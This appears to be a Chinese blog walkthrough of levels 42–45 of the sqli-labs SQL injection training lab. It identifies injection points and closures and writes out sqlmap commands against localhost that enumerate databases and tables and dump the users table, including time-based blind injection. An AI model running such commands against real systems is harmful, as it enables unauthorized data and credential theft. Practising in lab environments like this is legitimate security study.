sqli-labs第42~45关

于 2024-08-22 09:00:00 发布
阅读量212 收藏 1
点赞数 9
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46023655/article/details/141395329
版权

第42关

此关为post请求,采用burp suite拦截

 发现注入点在password,为单引号注入

 

字段数为3

得出数据库名 

采用sqlmap

方法一

将拦截的post请求代码复制,并建.txt文档

也可以在password后加*,表示优先测试

python sqlmap.py -r 路径/1.txt --dbs

可用的方法

方法二

不需要建立.txt文档

python sqlmap.py -u http://localhost/sqli-labs/Less-42/login.php/ --data="login_user=ad&login_password=1213&mysubmit=Login"

python sqlmap.py -u http://localhost/sqli-labs/Less-42/login.php/ --data="login_user=ad&login_password=1213*&mysubmit=Login" --dbs

 略

第43关

此关为post请求

注入点在密码处,为')闭合

 

python sqlmap.py -u http://localhost/sqli-labs/Less-43/login.php/ --data="login_user=a&login_password=12&mysubmit=Login" --dbs

略,方法与第42关差不多

第44关

post请求,无报错信息,采用盲注,此关为单引号闭合

为了方便,采用sqlmap

python sqlmap.py -u http://localhost/sqli-labs/Less-44/login.php/ --data="login_user=a&login_password=a&mysubmit=Login" --dbs

 判断注入点在password处

 

采用基于时间的SQL盲注

最终结果

数据库

得出表名

python sqlmap.py -u http://localhost/sqli-labs/Less-44/login.php/ --data="login_user=a&login_password=a*&mysubmit=Login" -D security --tables

 得出列名,并打印出用户名,密码(因为是基于时间的SQL盲注,会比较慢)

python sqlmap.py -u http://localhost/sqli-labs/Less-44/login.php/ --data="login_user=a&login_password=a*&mysubmit=Login" -D security -T users --columns --dump

第45关

此关为')闭合,无报错信息,可采用SQL盲注

参考44关sqlmap方法

熊熊爱吃不胖
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1285
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1415
sqli-labs基础篇 第11~17
Sqli-Labs(第11~第42)通笔记
weixin_54894046的博客
11-16 1128
sql注入lesson-11~31
SQLI-labs-第二十四
weixin_54055099的博客
05-24 433
Sqli-labs第24,二次注入
SQL注入——sqli-labs第二十四
lizhiiiii的博客
02-01 604
这一我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
sqli-labs第二十四
m0_73248913的博客
02-20 403
sqlilabs第十四
sqli-labs进阶篇 32~38
Lucky小小吴的小屋
02-06 958
本文章主要讲述sqli-labs靶场第32到38的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs(php7.3以上可运行)
01-29
二、sqli-labs平台介绍 sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种...
SQL 时间盲注 (injection 第十六
最新发布
baishiqi12的博客
08-20 435
SQL 注入,仅供参考
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 502
【代码】数据库 - 基础。
掌握SQL的威力:批量更新与删除的艺术
2401_85341950的博客
08-17 812
批量更新和删除是数据库管理中的重要操作,正确使用SQL可以大大提高数据处理的效率。通过本文的学习,读者应该能够理解并掌握如何安全、有效地执行这些操作。希望本文能够帮助您在数据库管理的道路上更进一步。以上就是于如何使用SQL进行数据的批量更新或删除的详细介绍和代码示例,希望能够对您有所帮助。如果您有任何疑问或需要进一步的讨论,请随时联系我们。
SQL - 多表查询
心如冰清,天塌不惊
08-18 463
【代码】SQL - 多表查询。
sqli-labs-master前10
07-28
回答: 在sqli-labs-master前10中,可以使用不同的注入方法来获取数据库和表的信息。其中,联合查询、报错注入和sqlmap是常用的注入方法。联合查询可以通过判断注入点的类型、判断列数和使用order by语句来获取表名和字段名。报错注入可以通过使用extractvalue()函数来获取表名、字段名和字段的详细内容。而sqlmap是一款专门用于自动化注入的工具,可以通过指定参数和选项来获取数据库名、表名、字段名和字段的详细信息。在具体的卡中,可以根据题目要求和注入点的特点选择合适的注入方法来解决问题。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [【渗透测试】sqli-labs闯(1-10)](https://blog.csdn.net/qq_43168364/article/details/105496598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [sqli-labs前十记录](https://blog.csdn.net/qq_43277152/article/details/113388041)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [sqli-labs(1-10)](https://blog.csdn.net/weixin_44268918/article/details/127181936)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值